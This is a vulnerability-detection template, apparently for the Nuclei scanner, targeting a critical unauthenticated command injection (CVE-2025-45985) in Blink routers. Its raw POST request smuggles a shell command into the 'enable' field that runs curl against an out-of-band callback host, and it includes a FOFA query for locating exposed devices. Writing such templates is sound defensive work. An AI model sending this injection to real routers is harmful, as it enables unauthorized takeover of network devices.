id: CVE-2025-45985 info: name: Blink Router - Command Injection author: darses severity: critical description: | Blink routers BL-WR9000 V2.4.9 , BL-AC2100_AZ3 V1.0.4, BL-X10_AC8 v1.0.5 , BL-LTE300 v1.2.3, BL-F1200_AT1 v1.0.0, BL-X26_AC8 v1.2.8, BLAC450M_AE4 v4.0.0 and BL-X26_DA3 v1.2.7 were discovered to contain a command injection vulnerability via the bs_SetSSIDHide function. impact: | Unauthenticated attackers can execute arbitrary operating system commands through the enable parameter in the set_hidessid_cfg endpoint, achieving complete device compromise. remediation: | Upgrade Blink router firmware to the latest version that properly sanitizes command parameters. reference: - https://github.com/glkfc/IoT-Vulnerability/blob/main/LB-LINK/LB-LINK_enable%20Unauthorized%20command%20injection/LB-LINK_enable%20command%20injection.md classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2025-45985 cwe-id: CWE-77 epss-score: 0.34666 epss-percentile: 0.97126 metadata: verified: true max-request: 1 fofa-query: title="B-LINK" tags: cve,cve2025,b-link,rce,router,vkev,vuln http: - raw: - | POST /goform/set_hidessid_cfg HTTP/1.1 Host: {{Hostname}} X-Requested-With: XMLHttpRequest Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: {{RootURL}} Referer: {[RootURL]}/admin/more.html Cookie: platform=0; user=admin type=sethide2&enable=";curl {{interactsh-url}};" matchers-condition: and matchers: - type: word part: body words: - '"type":' - '"result":' condition: and - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - type: status status: - 200 # digest: 4a0a004730450221009ffd766b7483dd9fc78c33703fa6ad0155142979746dd8293b39d3a98284094002207c55853d740fefaedbba0efb205188840995f9d8745fd4de5e02fe9d0acf9ca4:922c64590222798bb761d5b6d8e72950